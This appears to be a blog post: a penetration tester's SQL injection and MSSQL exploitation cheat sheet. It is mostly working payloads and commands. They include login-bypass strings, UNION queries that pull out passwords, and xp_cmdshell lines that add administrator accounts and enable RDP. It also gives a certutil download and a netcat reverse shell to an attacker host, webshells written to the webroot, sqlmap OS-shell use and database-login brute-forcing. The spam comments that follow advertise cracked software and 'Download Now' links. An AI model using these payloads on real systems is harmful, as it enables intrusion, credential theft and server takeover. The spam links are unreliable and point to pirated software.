1) MSSQL Injection Cheat Sheet | pentestmonkey
2) xp_cmdshell | Red Team tales
3) PentesterMonkey SQL Injection Cheatsheet
Use dbeaver for GUI Access
4) SQL Injection Explanation | Graceful Security
Common Ports
Microsoft SQL:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)
Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP
MongoDB:
27017,27018,27019/TCP
PostgreSQL:
8432/TCP
MySQL:
3306/TCP
SQL DB Enum with nmap:
nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add"
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.10
MSSQL/MYSQL DB Login Bruteforce
git clone https://github.com/m8r0wn/enumdb.git
cd enumdb
python3 setup.py install
Download Wordlist from Seclists
cat mssql-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt
#Port is optional
#-t = mysql or mssql; mssql port 1433/1434; mysql port - 3309
# -U = users.txt, -u = username; -P = passwords.txt, -p = password
enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v
SQSH usage:
sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'
\go
EXEC xp_cmdshell 'net localgroup administrators bhanu /add'
\go
MssqlClient
Exploiting From Windows with Explanation - Nikhil Mittal
#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)
mssqlclient.py username@10.10.10.10
#Run arbitary commands
xp_cmdshell whoami
#View Version
SELECT @@version
#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();
#List Users
SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';
#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
#Enum Privs
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
#Show Servername
select @@servername
#Show linked servers
select * from sysservers;
select name from sysservers;
#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
#Check sysadmin accounts on the server/DB
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];
#Running command as a linked server using the server that we have permissions on
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#View the permissions you have on the linked database.
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as other user multile times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
#Login as a new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123
#List Databases
SELECT name FROM master..sysdatabases;
#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]
select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;
#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
#Abusing Xpdirtree
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1' /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
/This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
/union all is used to combine 2 or more select statements
/Where ever output is displayed - it is suitable to enumerate, here 5
website.com/comment.php?id=738 union select 1,2,3,4,@@version,6 /mysql version command
website.com/comment.php?id=738 union select 1,2,3,4,user(),6 /Current user
website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
/Prints all of the table names in the database
website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
/Extract column names from Table - Ue
website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users
ERROR BASED SQL Injection: SQLLITE
==================================
http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;
http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;
search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--; # Get all table names in sqlite_master db
search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--; #Get usernames and passwords
TIME BASED SQL INJECTION:
--------------------------
In Time Based SQL injection - if the query is true - it will wait for the sleep time or else
executed immediately.
website.com/comment.php?id=738-sleep(5) /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Executes after 5 seconds -Because the statement is true
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Executes Immediately - Statement is false
website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
/Loading a file from the server
website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'
website.com/backdoor.php/cmd?ipconfig
SQL Command Injection: MSSQL
bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--
admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--
admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe
sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password
If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Creating an Admin Account with RDP Access:
aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--
aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--
aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---
NSE Script for XP_CMDSHELL
Bypassing Restriction Interfaces:
----------------------------------
Use Tamper Data Firefox plugin. /Intercetps Posts requests
start tampter data --> input something inoto input field. or change the items in
drop down.
SQLMAP:
---------
#Skip a parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param_Name
#Test only specified parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param1,Param2
#Dump All DB dat
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5
#Get a shell
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell
sqlmap --help
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
List all the databases:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--dbs
Current User:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--current-user
Current DB:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--current-db
Tables:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--tables -D owasp10
Columns:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--columns -T accounts -D owasp10
Dump:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
-T accounts -D owasp10 --dump
OS Shell:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--os-shell
SQL Shell:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--sql-shell
current_user()
user()
database()
select tablename from information_schema.table where table_schema = 'owasp10'
Methodology
1) Check for login pages - try all special characters
2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that
Cheatsheet
admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--
USERNAME: ' or 1/*
PASSWORD: */ =1 --
USERNAME: admin' or 'a'='a
PASSWORD '#
If the database is mysql, try to dump all login info to files?
Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--
union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
I appreciate your cooperation. Right on target I appreciate your help.Thank you so much for sharing all this wonderful info with the how-to's!!!! It is so appreciated!!! You always have good humor in your posts/blogs. So much fun and easy to read!
ReplyDeletecrack mac
iZotope RX 9 Audio Editor Advanced Crack
DBeaver Crack
MadMapper Crack
Tridef 3D Crack
Sql Injection Cheat Sheet >>>>> Download Now
Delete>>>>> Download Full
Sql Injection Cheat Sheet >>>>> Download LINK
>>>>> Download Now
Sql Injection Cheat Sheet >>>>> Download Full
>>>>> Download LINK zo
Good thinking Prestigious work Good work/Good job Proper Grand Purrrfect Great Remarkable Great going Resounding results Honorable Respectable I appreciate your cooperation. Right on target I appreciate your help.Thank you so much for sharing all this wonderful info with the how-to's!!!! It is so appreciated!!! You always have good humor in your posts/blogs. So much fun and easy to read!
ReplyDeleteCrack Mac Download
VMware Workstation Pro Crack
Paragon Hard Disk Manager Crack
Reason Crack
Tuxera NTFS Crack
MadMapper Crack
iZotope RX 9 Audio Editor Advanced Crack
Aiseesoft 3D Converter Crack
After looking through a few blog articles on your website,we sincerely appreciate the way you blogged.We’ve added it to our list of bookmarked web pages and will be checking back in the nearfuture. Please also visit my website and tell us what you think.Great work with hard work you have done I appreciate your work thanks for sharing it.
ReplyDeleteFxFactory Pro Crack
DBeaver Crack
CuteFTP Pro Crack
iBeesoft Data Recovery Crack
AmiBroker Crack
Full Movies Online Streaming and TV Shows Streaming for Free - Fast and Free with Excellent Support on a Variety of Devices - MyFlixer - Safe and Private Streaming
ReplyDeleteSql Injection Cheat Sheet >>>>> Download Now
ReplyDelete>>>>> Download Full
Sql Injection Cheat Sheet >>>>> Download LINK
>>>>> Download Now
Sql Injection Cheat Sheet >>>>> Download Full
>>>>> Download LINK 6H
You Can Also Get Cracked Software For Windows & Mac Free Download
ReplyDeletehttps://tijacrack.com/fxfactory-pro-crack/
Thank you for sharing this usefull blog. We offer the best place to a Buy home gadgets online at the best price. From here you can Buy phone accessories, headphones, leviation lamp, Best Flame Humidifier Lamp, apple charger station, a 360° Rotation Face Tracking Selfie Stick, 4 IN 1 Apple Charger Station With LED Light Lamp, Enjoying Headphones, Flame Humidifier Lamp, Levitating Bonsai Pot and Levitation Lamp online.
ReplyDelete